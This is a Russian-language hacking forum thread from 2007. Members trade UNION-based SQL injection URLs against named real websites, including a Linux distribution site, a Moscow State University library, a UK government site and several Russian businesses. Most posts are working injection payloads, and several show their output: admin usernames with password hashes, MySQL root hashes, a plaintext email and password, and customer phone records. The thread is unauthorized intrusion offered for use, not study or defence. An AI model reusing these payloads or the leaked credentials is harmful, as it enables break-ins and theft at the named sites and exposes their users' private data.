02.04.2007, 18:12
|
|
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
С нами:
10085717
Репутация:
590
|
|
Код:
http://photo.dive.kz/photo.php?id=-784+union+select+1,2,3,concat(database(),0x3a,user(),0x3a,version()),5,6/*
|
|
|
02.04.2007, 18:42
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
Какой то векторлинукс, в первый раз слышу. http://vectorlinux.com/ Ну да пох=\
Скуль:
http://vectorlinux.com/article.php?sid=40'
Колумны:
http://vectorlinux.com/article.php?sid=-40+union+select+1,2,3,4,5,6,7,8
Версия 4.1.20:
http://vectorlinux.com/article.php?sid=-40+union+select+1,2,3,VERSION(),5,6,7,8
Т.к. мускул ниже 5 ветки, то тупо перебераем таблицы.
http://vectorlinux.com/article.php?sid=-40+union+select+1,2,3,4,5,6,7,8+from+users
Что бы небыло ебли с именами колонок, смотрим форму авторизации:
Код HTML:
Nickname: <input type="text" name="uname" size="12" maxlength="25" /><br />
Password: <input type="password" name="pass" size="12" maxlength="20" /><br />
Ибо:
http://vectorlinux.com/article.php?sid=-40+union+select+1,2,3,concat(uname,0x3a,pass),5,6, 7,8+from+users
Tigger:dd0ced770c9b3a5209a1c48dba1c6d86
Всё=\ |
|
|
|
02.04.2007, 18:47
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Код:
http://www.antikvar.su/index.php?http_id_part=77&http_id_prod=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
http://www.antikvar.su/index.php?http_id_part=77&http_id_prod=-1+union+select+1,concat(client,char(58),phone),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+request+limit+0,1/*
Код:
http://www.baltex.ru/rus/news/region/yug/?id=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8/*
http://www.baltex.ru/rus/news/region/yug/?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+information_schema.tables+limit+38,1/*
Код:
http://kvadroplast.perm.ru/catalog.html?cat=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8/*
Кстати я тоже имена колонок смотрю в исходниках формы - почти всегда прокатывает, и ни какие информатион_счема не нужны, хотя с ними тоже не плохо)) |
|
|
|
02.04.2007, 18:48
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
Add:
Хотя если поиграть с лимитами, выдаёт другого юзера:
http://vectorlinux.com/article.php?sid=-40+union+select+1,2,3,concat(uname,0x3a,pass),5,6, 7,8+from+users+limit+1,1
|
|
|
|
02.04.2007, 18:58
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
Колонка CHARACTER_SET_NAME
Таблица CHARACTER_SETS
Так что только:
ЛОЛ =D
а лимит уже не рулит что ли?
http://www.philos.msu.ru/library.php?sid=-1+union+select+1,2,TABLE_NAME,4,5,6,7,8,9,10,11+fr om+INFORMATION_SCHEMA.TABLES+limit+1,1/*
|
|
|
|
02.04.2007, 19:03
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
Сообщение от Spyder
ЛОЛ =D
а лимит уже не рулит что ли?
http://www.philos.msu.ru/library.php?sid=-1+union+select+1,2,TABLE_NAME,4,5,6,7,8,9,10,11+fr om+INFORMATION_SCHEMA.TABLES+limit+1,1/*
И это чем то помогло? =\
|
|
|
|
02.04.2007, 19:27
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами:
10160966
Репутация:
1719
|
|
Сообщение от [sL1p]
И это чем то помогло? =\
меня глючит или пароль не выведен? колонка 'passw'
Код:
http://www.philos.msu.ru/library.php?sid=-1+union+select+1,2,concat(login,0x3a,passw),4,5,6,7,8,9,10,11+from+users/*
admin:a98948bf0421ef30e4e19c0b4844600d
ну и от меня еще:
restko.ru
Код:
http://www.restko.ru/index.php?level=99&info=-99+union+select+convert(concat(user,0x3a,password)+using+cp1251)+from+mysql.user/*
root_s194u:*FB96B86F2CB3B44E1F1854B65E4333A1649F18 6B
к мускул..
Код:
http://www.restko.ru/index.php?level=99&info=-99+union+select+convert(concat(email,0x3a,pass)+using+cp1251)+from+user/*
пароли в чистом виде.. пример - restko@restko.ru:rel021
//upd:
Сообщение от NOmeR1
Поздравьте меня! Мой первый скуль :
Поле там вроди одно
 а вроде нет.. двадцать два 
Код:
http://www.russianst.com/mobile/phone.php?p=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
дальше сам думай)
Последний раз редактировалось n1†R0x; 02.04.2007 в 19:34..
|
|
|
|
02.04.2007, 19:37
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
Сообщение от n1†R0x
меня глючит или пароль не выведен? колонка 'passw'
Код:
http://www.philos.msu.ru/library.php?sid=-1+union+select+1,2,concat(login,0x3a,passw),4,5,6,7,8,9,10,11+from+users/*
admin:a98948bf0421ef30e4e19c0b4844600d/me ступил=\\\
|
|
|
|
03.04.2007, 04:31
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
С нами:
10225766
Репутация:
2062
|
|
Сообщение от n1†R0x
ну и от меня еще:
restko.ru
Код:
http://www.restko.ru/index.php?level=99&info=-99+union+select+convert(concat(user,0x3a,password)+using+cp1251)+from+mysql.user/*
боян
а вот от меня, к сожалению 3 версия скорее всего
Код:
http://www.montenegrostars.com/new/hoteli.php?id_hot=1&id_jez=1+order+by+4/*
http://www.montenegrostars.com/new/hoteli.php?id_hot=1&id_jez=1+order+by+8/*
http://www.montenegrostars.com/new/hoteli.php?id_hot=1&id_jez=1+order+by+9/*
http://www.montenegrostars.com/new/hoteli.php?id_hot=1&id_jez=1+AND+ascii(lower(substring(version(),1,1)))=52/*
здесь ничего интересного:
Код:
http://www.iwdp.co.uk/profile.php?id=-220+union+select+1,name,3,4,5,6,7,8,9,10,11+from+regions/*
здесь не смог сделать вывод (название знакомое, кажется уже ковырял эту скулю)
Код:
http://www.biodiversityscotland.gov.uk/pageType1.php?id=2&type=1&navID=-27+union+select+1,2,3,4,5,6/*
Последний раз редактировалось Thanat0z; 03.04.2007 в 05:32..
|
|
|
|
03.04.2007, 11:22
|
|
Познающий
Регистрация: 05.09.2006
Сообщений: 50
С нами:
10357689
Репутация:
250
|
|
Код:
http://www.no2anticommunism.org/ru/index.php?info=doc&Id=-40+union+select+1,passwd,3,4,5,6,7,8,9,10,11,12+from+users/*
Код:
http://socdvig.org.ru/index.php?action=viewnews&id=-31+union+select+1,2,3,4,5,6,7+from+users/*
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
